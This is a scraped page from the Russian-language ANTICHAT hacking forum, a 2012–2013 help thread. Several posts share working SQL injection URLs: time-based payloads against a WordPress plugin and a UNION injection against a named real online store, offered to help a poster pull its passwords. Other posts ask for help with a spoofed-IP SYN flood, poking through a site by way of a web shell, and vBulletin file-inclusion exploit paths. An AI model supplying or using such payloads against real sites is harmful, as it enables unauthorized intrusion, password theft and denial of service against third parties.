ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

09.12.2012, 16:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 193811
Репутация:
724
|
|
Сообщение от Pinkie
Pinkie said:
чем отправлять post запрос на сайт чужой?
Burp Suite, HTTP Analyze -> build request
|
|
|
|

09.12.2012, 17:18
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от blesse
blesse said:
Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,
Плагин на exploit-db
Poc:
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)--%20
Я запрашиваю:
1)
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(ble sse()))),0)--%20
2)
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20
Какой либо задержки в обоих случаях не последовало.
Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
сайт в пм вышли, я тут синтаксис напишу нужный
|
|
|

12.12.2012, 13:36
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от grimnir
grimnir said:
Привет! Через havij получаю доступ к базе http://store.vampirefreaks.com/?cat_id=11 но не могу вытянуть пароли ,просто ??? http://imageshack.us/photo/my-images/10/utennavnxd.png/
можно как-то вытянуть пароли?
Вывод можно добиться вот так
_ttp://store.vampirefreaks.com/?cat_id=-11'+union+select+1,2,@@version,4,5+and+1='2
Забудь про havij - он не более чем дампер. Выведешь руками - потом сдампишь.
А вообще тема для подобных вопросов тут
|
|
|

12.12.2012, 18:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 29647
Репутация:
1
|
|
Сообщение от BigBear
BigBear said:
сайт в пм вышли, я тут синтаксис напишу нужный
Ну что не осилил?
|
|
|
|

12.12.2012, 18:17
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от blesse
blesse said:
Ну что не осилил?
Продублируй в ПМ. Походу удалил случайно пока почту чистил.
|
|
|

18.01.2013, 12:17
|
|
Новичок
Регистрация: 08.04.2009
Сообщений: 26
Провел на форуме: 41377
Репутация:
1
|
|
Мужики, кто знаком с Textpattern 4.0.5, подскажите в каком файле лежит шаблон. Доступа в админку нет, а через шелл не удается найти шаблон, уже все перерыл.
|
|
|

29.01.2013, 14:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Syn flood
Подскажите пожалуйста с таким вопросом: Syn flood, собираю пакет с случайным ip, если отправляю пакет с той же подсети что и сервер, тогда на сервере создается очередь полуоткрытых соединений, если же подсеть другая (внешний канал) тогда пакеты не доставляются. Чексумма правильная. Совсем не знаю в чем ошибка.
|
|
|
|

29.01.2013, 18:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Угнали ФТП,- нужно проверить на шеллы
Здравствуйте форумчане, такая ситуация:
вирус поймал, угнал мои фтп пароли, повшивали редиректов и .htaccess и ифреймов в шаблоны.
Я все сделал - обезопасил доступ, но нужна помощь в проверке на шелы итд. - хостинг ukraine ком юа.
буду рад любой информации или предложениям!
|
|
|
|

01.02.2013, 09:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 447
Репутация:
0
|
|
Какой алгоритм генерации хэшей паролей использует ebiz cms?
|
|
|
|

10.02.2013, 01:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 11910
Репутация:
0
|
|
Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion
Кто-то пробовал? Все облазил-нашел только следующее
# Exploit :
#
# http://www.site.com/path/includes/class_block.php?classfile=[shell code]
#
# http://www.site.com/path/vb/vb.php?filename=[shell code]
#
# http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code]
Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк???
Если не сюда пишу-посоветуйте раздел, где спросить можно.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|